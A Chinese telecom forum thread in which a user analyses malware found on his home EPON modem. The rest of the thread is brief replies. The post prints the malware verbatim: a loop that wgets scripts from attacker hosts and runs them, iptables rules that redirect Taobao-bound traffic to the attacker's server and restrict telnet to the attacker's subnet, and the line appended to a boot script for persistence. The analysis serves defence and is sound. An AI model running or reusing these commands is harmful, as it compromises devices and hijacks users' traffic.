通信人家园

标题: EPON终端被黑记（RG200O-CA) [查看完整版帖子] [打印本页]

时间: 2015-12-30 20:47

作者: xzhower 标题: EPON终端被黑记（RG200O-CA)

最近发现家里上网特别慢，经常打不开网页，排查两天发现是家里EPON的Modem（型号RG200O-CA）被黑了。

telnet进入Modem，检查系统文件，突然telnet中断，无法再telnet。断电重启，可以telnet进去，过一会儿还是telnet会中断。遂断开光纤，此时telnet正常，不再发生中断现象，初步判断telnet中断现象与上网状态有关。怀疑是Modem被木马感染。反复PS检查当前进程信息，突然发现一行可疑信息：

......
wget -q -P /tmp http://koudaiba.sinaapp.com start.sh
......

此前因为仔细研究过这台Modem，开启了路由功能，并成功编译上传了一个打印服务器的程序，对这个Modem的系统比较了解，从未出现过这样的信息，因此可以断定确实是Modem受到了感染。
经过搜索，上面的那行命令是通过/home/sh.sh启动的，查看/home/sh.sh内容如下：

# cd /home
# ls
sh.sh
# ls -l
-rw-r--r-- 1 admin root 466 Nov 23 07:26 sh.sh
# cat sh.sh
#!/bin/sh
while true
do
sleep 100
wget -q -P /tmp http://59.56.68.183:20011/start.sh || wget -q -P /tmp http://koudaiba.sinaapp.com/start.sh || wget -q -P /tmp http://abcdabcdabcdabcdabcd.com/start.sh && sh /tmp/start.sh && while true
do
wget -q -P /tmp http://59.56.68.183:20012/while.sh || wget -q -P /tmp http://koudaiba.sinaapp.com/while.sh || wget -q -P /tmp http://abcdabcdabcdabcdabcd.com/while.sh || sleep 43200 && sh /tmp/while.sh || sleep 43200
done
done

可以看到木马程序从两个网站下载shell脚本并反复循环执行，好吧，我也下载下来看看里面什么东东

#!/bin/sh

for ip in"140.205.140.188" "110.75.96.102" "106.39.164.154" "140.205.142.214" "140.205.135.67" "140.205.164.96" "140.205.250.86" "110.75.206.8" "140.205.140.76" "140.205.32.93" "140.205.243.65" "140.205.170.51" "140.205.134.199" "140.205.230.37" "140.205.250.42" "110.75.96.109";do

iptables -t nat -D PREROUTING -p tcp -d $ip --dport 80 -j DNAT --to-destination 59.56.68.183:20002

iptables -t nat -I PREROUTING -p tcp -d $ip --dport 80 -j DNAT --to-destination 59.56.68.183:20002

done

for ip in"120.24.0.0/14" "121.40.0.0/14" "119.28.0.0/15" "203.195.128.0/17" "115.28.0.0/15" "114.215.0.0/16" "120.55.0.0/16";do

iptables -t nat -D PREROUTING -p udp -d $ip --dport 53 -j DNAT --to-destination 114.114.114.114

iptables -t nat -I PREROUTING -p udp -d $ip --dport 53 -j DNAT --to-destination 114.114.114.114

done

iptables -D INPUT ! -s 59.61.121.0/24 -p tcp --dport 23 -j DROP

iptables -I INPUT ! -s 59.61.121.0/24 -p tcp --dport 23 -j DROP

sleep 86400

看到一串IP地址，后面又设置了防火墙规则。最后面的两条太显眼，就是只允许指定的网段能够telnet控制我的Modem，我之前的telnet中断现象就是它干的。
前面两条规则是把对上面那些IP TCP 80端口的访问数据全部转发到了59.56.68.183的20002端口；
中间的两条规则是把对中间那段IP地址段的DNS访问全部转发到了114.114.114.114貌似这没有太大的危害。
那就再来看看一开始的哪些IP地址是谁的吧，随便找个IP地址试试：

C:\>telnet 140.205.140.188 80

HTTP/1.1 302 Found
Server: Tengine
Date: Sat, 26 Dec 2015 15:04:00 GMT
Content-Type: text/html
Content-Length: 258
Connection: close
Location: http://www.******.com/
Via: ad052071.et2[web,302]

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<h1>302 Found</h1>
<p>The requested resource resides temporarily under a different URI.</p>
<hr/>Powered by Tengine</body>
</html>

乖乖，居然是淘宝的IP，原来这个木马劫持了淘宝的IP，受害的用户不知不觉就连到了木马控制人的服务器上，真是吓死宝宝了。到百度一搜，那些IP地址大都是阿里巴巴的。
而木马控制人的服务器IP59.56.68.183是福建某地的。

回头再来看看木马程序是如何启动的，查到/etc/有个rc_vtp2.0
-r-xr-xr-x 1 admin root 545 Nov 23 07:26 rc_vtp2.0
看看它的内容：

# cat rc_vtp2.0
#!/bin/sh

mkdir /var/tmp/tftp
mkdir /var/config
mkdir /var/ctc

mkdir /var/net-snmp
mkdir /var/syslog

/usr/sbin/lightbox

# enhanced the logic unix/inet socket buffer and backlog
echo -n "max_dgram_qlen is changed from "
cat /proc/sys/net/unix/max_dgram_qlen > /dev/console
echo 100 > /proc/sys/net/unix/max_dgram_qlen
echo -n "to "
cat /proc/sys/net/unix/max_dgram_qlen > /dev/console
echo -n "change the socket recv buffer uplimit to 512k"
echo "524288" > /proc/sys/net/core/rmem_max

sleep 1

cm_logic&

sleep 1

syslogd &

sh /home/sh.sh&

在最后多了一句，之前的内容可能是原来就有的。
再看看rc_vtp2.0是在哪儿启动的，只在/etc/profile中有一句

......
/etc/rc_vtp2.0

......

这就奇怪了，按理/etc/profile只有在有人登录之后才会执行，是不是还有另外的地方启动呢？

先赶紧把这些木马文件干掉，回头继续查。

2015.12.26 23:19

时间: 2015-12-30 23:30

作者: feihuoliuxing

本帖最后由 feihuoliuxing 于 2015-12-30 23:30 编辑

太高深，看不懂。楼主应该是搞研发的

时间: 2015-12-31 00:25

作者: sw_yp

很好奇路由器怎么被黑的呢？

时间: 2015-12-31 12:02

作者: ksmter

纯桥接光猫表示不怕

时间: 2016-1-1 10:50

作者: yangenwei

时间: 2016-1-4 11:51

作者: busiway

与普通路由被黑大同小异。。。。。光猫拨号模式的无有使惊。。。

时间: 2016-1-6 14:45

作者: zhb66

很可怕

时间: 2016-1-6 16:06

作者: tdwj52

好专业, 表示看不懂,好像很厉害的样子

时间: 2016-1-6 20:35

作者: rovelover

可能是淘宝的推广链接，打开网页后是后有提成

时间: 2016-1-7 11:04

作者: sun_qing88

为什么会被黑那，原因找到了吗

时间: 2016-1-7 14:40

作者: popeyes

师母已呆，坐等后续结果，期待楼主能够把详细操作方法公布，俺也回去好好审审家里那只老猫

时间: 2016-1-7 17:22

作者: liaoshoubo

好屌的样子，我就看看，我不说话

时间: 2016-1-7 19:34

作者: earoc

好屌的样子，我就看看，我不说话

时间: 2016-1-7 21:08

作者: 几夜几页

时间: 2016-1-7 21:12

作者: 1364711749

表示看不懂

时间: 2016-1-7 21:14

作者: 1364711749

光猫都能被黑？

时间: 2016-1-8 13:44

作者: gdpjcgd

Linux高手啊赞！

时间: 2016-1-11 16:47

作者: qnavjnet

好，高手一枚！

时间: 2016-1-24 19:38

作者: charleskao

刷的什么系统，openwrt?

时间: 2016-2-6 06:32

作者: wjp3ng

高手一枚！

时间: 2016-2-18 12:59

作者: emptysky

lz厉害学习了

通信人家园 (https://www.txrjy.com/)